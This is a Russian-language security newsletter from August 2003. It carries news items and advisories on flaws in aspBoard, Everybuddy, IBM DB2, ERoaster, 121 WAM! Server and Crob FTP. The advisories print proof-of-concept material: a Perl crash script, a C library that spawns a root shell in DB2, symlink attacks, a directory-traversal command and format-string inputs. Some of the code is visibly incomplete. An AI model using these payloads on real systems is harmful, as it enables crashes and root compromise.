Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/8/8 00:18 - 2003/8/8 23:26


Ущерб от хакеров уменьшается

8 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер

Проведенный недавно Институтом компьютерной безопасности (ИКБ) и Федеральным бюро расследований (ФБР) совместный опрос показал, что хакерские атаки на американские компании и другие организации нанесли за минувший год по сравнению с предыдущим вдвое меньший финансовый урон. Одновременно снизилось с 60% до 56% и число фирм, отметивших несанкционированное использование своих систем.

Нынешнее исследование продемонстрировало также, что большинство компаний по-прежнему не торопятся извещать правоохранительные органы о взломах и атаках. После обнаружения подобных инцидентов только 30% опрошенных сообщили о них властям, тогда как год назад этот показатель составлял 34%. Подобная пассивность имеет под собой две основные причины: боязнь неблагоприятного общественного мнения и опасения, что этой информацией воспользуются в своих целях конкуренты.

Чаще всего, как и раньше, отмечаются сетевые атаки, вирусы, нецелевое использование блокнотных ПК и несанкционированный доступ. О поражении вирусами в опросе сказали целых 82% респондентов, что, впрочем, меньше прошлогодних 85%. Но самым поразительным результатом опроса стало резкое снижение ожидаемого финансового ущерба от атак.

В этом году 530 обследованных организаций сообщили о потере 201,8 млн. долл., тогда как в прошлом 503 респондента не досчитались 455,8 млн.

К исследованию компьютерной преступности и безопасности, ежегодно проводимому ИКБ и ФБР, привлекаются специалисты американских корпораций, правительственных учреждений, университетов и других организаций. Нынешний опрос -- восьмой по счету.

Из результатов опроса обычно цитируется отношение числа атак, производимых изнутри организаций, к их количеству извне. Производители средств безопасности используют этот параметр, чтобы доказать необходимость своей продукции.

В текущем году тенденция к повышению доли внешних сетевых атак сохранилась. Около 78% респондентов заявили, что чаще всего подвергаются нападениям через Интернет, и только 30% -- что главный вектор атак был направлен изнутри (в прошлом году это отмечало 33% опрошенных).

Опрос показал и еще один интересный результат: гораздо реже теперь упоминается несанкционированный доступ или нецелевое применение Web-узлов. Число таких упоминаний снизилось с 38% в прошлом году до 25% в нынешнем. Из тех же, кто подвергся таким атакам, 69% сообщили о пяти и менее инцидентах.

Чаще всего при этом говорили о вандализме (36%) и атаках типа "отказ от обслуживания" (35%).

0

Компании делают заплаты к брешам в ПО впустую

8 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны взлом Технологии безопасности. Организации разработчики, интеграторы.

Выявление дыр в том или ином ПО в большинстве случаев молниеносно вызывает появление соответствующей заплаты. Вот только пользователи очень уж небрежно относятся к их установке.

Исследование активности установки заплат провела компании Qualys. Причем главный акцент был сделан на корпоративных пользователей, от расторопности которых зависит безопасность целых сетей. В 80 процентах случаев времени достаточно для того, чтобы хакеры успели создать утилиты для атаки на ПК корпоративных пользователей. Если речь идет о некритической ошибке, то процесс установки заплат может растянуться на месяцы.

Информацией для исследования стали результаты сканирования полутора миллионов компьютерных систем, сообщает ZDNet.

1

Закрытый код изобилует дырами

8 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимость

В ходе последнего семинаре BlackHat, проходившего в Лас-Вегасе, была продемонстрирована утилита, которая позволяет находить уязвимости в ПО с закрытым кодом.

Ее представил Грег Хогланд. Утилита под названием Bug Scanic анализирует EXE-файлы и ищет дыры в системах их безопасности.

В ходе семинара Хогланд наглядно показал результаты сканирования нескольких популярных у пользователей всего мира программных продуктов. Результаты были шокирующими - большинство программ имеют очень низкую степень защиты.

Как считают эксперты, возможно именно эта программа заставит еще раз задуматься о выборе между патентованным ПО и софтом с открытым кодом, сообщает CNET.

2

Межсайтовый скриптинг в ASPBoard

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость в проверке правильности входных данных обнаружена в aspBoard. Удаленный пользователь может выполнить XSS нападение.

Программное обеспечение не фильтрует HTML код, представленный пользователем, из поля URL при отправке сообщения. В результате удаленный атакующий может вставить произвольный код сценария в тело сообщения, который будет выполнен в браузере пользователя, просматривающего это сообщение.

Уязвимость обнаружена в aspBoard 1.2

Способов устранения обнаруженной уязвимости не существует в настоящее время.

3

DoS против Everybuddy

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Отказ в обслуживании обнаружен в Everybuddy. Удаленный пользователь может аварийно завершить работу клиента целевого пользователя.

Удаленный пользователь может послать специально сформированное чрезмерно длинное сообщение (примерно 1540 символов) к целевому пользователю, чтобы аварийно завершить работу целевого клиента.

Уязвимость обнаружена в Everybuddy 0.4.3

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

use MSN; # from  <http://www.adamswann.com/library/2002/msn-perl/> 
http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status => \&Status,
    Answer => \&Answer,
    Message => \&Message,
    Join => \&Join }
);


sub Status {
   my ($self, $username, $newstatus) = @_;

   print "Status() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Print the status change info.
   print "${username}'s status changed from " . 
$self->buddystatus($username) . " to $newstatus.\n";

      # Initiate the call.
      $self->call($username);

      # The call may take a few seconds to complete, so we can't
      # immediately send messages. Let's put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, "Glad to see you online!");
   }

 

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print "Message() called with parameters:\n";
   print " " . join(",", @_), "\n";

 

sub Join {
   my ($self, $username) = @_;

   print "Join() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # See if there's anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
 

sub Answer {
   my ($self, $username) = @_;

   print "Answer() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Send a hello message.
   $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
4

Локальный пользователь с bin привилегиями может получить root привилегии в IBM DB2

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена в базе данных IBM DB2. Локальный пользователь с ‘bin’ привилегиями может получить root привилегии на системе.

Локальный пользователь с ‘bin’ привилегиями пользователь может сконструировать ‘so’ библиотеку в lib каталоге базы данных ('/usr/IBMdb2/V7.1/lib' в IBM DB2 7.1 и '/opt/IBM/db2/V8.1/lib' в IBM DB2 8.1). Пример:

#include <stdio.h>
#include <string.h>

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   system("/bin/bash");
   printf("Saliendo del Init()\n");
Затем, когда будет запущенна база данных, произвольный код в библиотеке будет выполнен с root привилегиями.

Уязвимость обнаружена в IBM DB2 7.1, 8.1 и возможно другие версии

Способов устранения обнаруженной уязвимости не существует в настоящее время.

5

Запись произвольных файлов с root привилегиями в IBM DB2 'db2job'

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена в базе данных IBM DB2 в 'db2job' приложении. Локальный пользователь с некоторыми привилегиями может получить root доступ в системе.

Локальный пользователь с привилегиями на выполнение 'db2job', может записать произвольные root-owned файлы с 770 разрешениями (read/write/execute для root).

Как сообщается, './db2as/sqllib/adm/db2job' не понижает привилегии перед записью лог файлов и также создает следующие root-owned файлы:

-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.prf
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.bak
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobsm.bak
-rwxrwx--- 1 root db2asgrp /home/db2as/sqllib/0_1.out
Локальный пользователь может сконструировать символьные ссылки с критического файла на системе к '0_1.out' файлу. Затем, когда запустится 'db2job', ссылающийся файл будет перезаписан с root привилегиями.

Уязвимость обнаружена в IBM DB2 7.1

6

Поднятие локальных привилегий в ECLiPt Roaster

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обанружена в ECLiPt Roaster (ERoaster), графической оболочки для cdrecord и mkisofs. Локальный пользователь может получить поднятые привилегии.

ERoaster использует небезопасные временные файлы в качестве блокирующего файла. Локальный пользователь может сконструировать символьные ссылки из критического файла на системе к временному файлу. Затем, когда целевой пользователь выполняет ERoaster, ссылающийся файл может быть перезаписан с привилегиями текующего пользователя. В результате локальный пользователь может получить привилегии целевого пользователя.

Уязвимость обнаружена в ECLiPt Roaster (ERoaster) prior to 2.2.0-0.5

7

Доступ к произвольным файлам вне ftp root в 121 WAM! Server

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость в проверке правильности входных данных обнаружена в 121 WAM! Server. Удаленный авторизованный пользователь может просматривать произвольные файлы, расположенные вне root каталога FTp сервера.

Пример:

CWD /./

Уязвимость обнаружена в 121 WAM! Server 1.0.4.0

Способов устранения обнаруженной уязвимости не существует в настоящее время.

8

DoS против Crob FTP Server

8 августа | Рубрика: Дыры и патчи программ и операционных сред

Отказ в обслуживании обнаружен в Crob FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера.

Удаленный пользователь сожжет переименовать файл к "con", чтобы аварийно завершить работу FTP сервера.

Также сообщается, что пользователь может войти в систему с именем пользователя '%s%s%s%s%s%s' или послать FTP команды со строкой '%s%s%s%s%s' (например dir %s%s%s%s%s%s"), чтобы аварийно завершить работу сервера.

Уязвимость обнаружена в Crob FTP Server 2.60.1

9




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное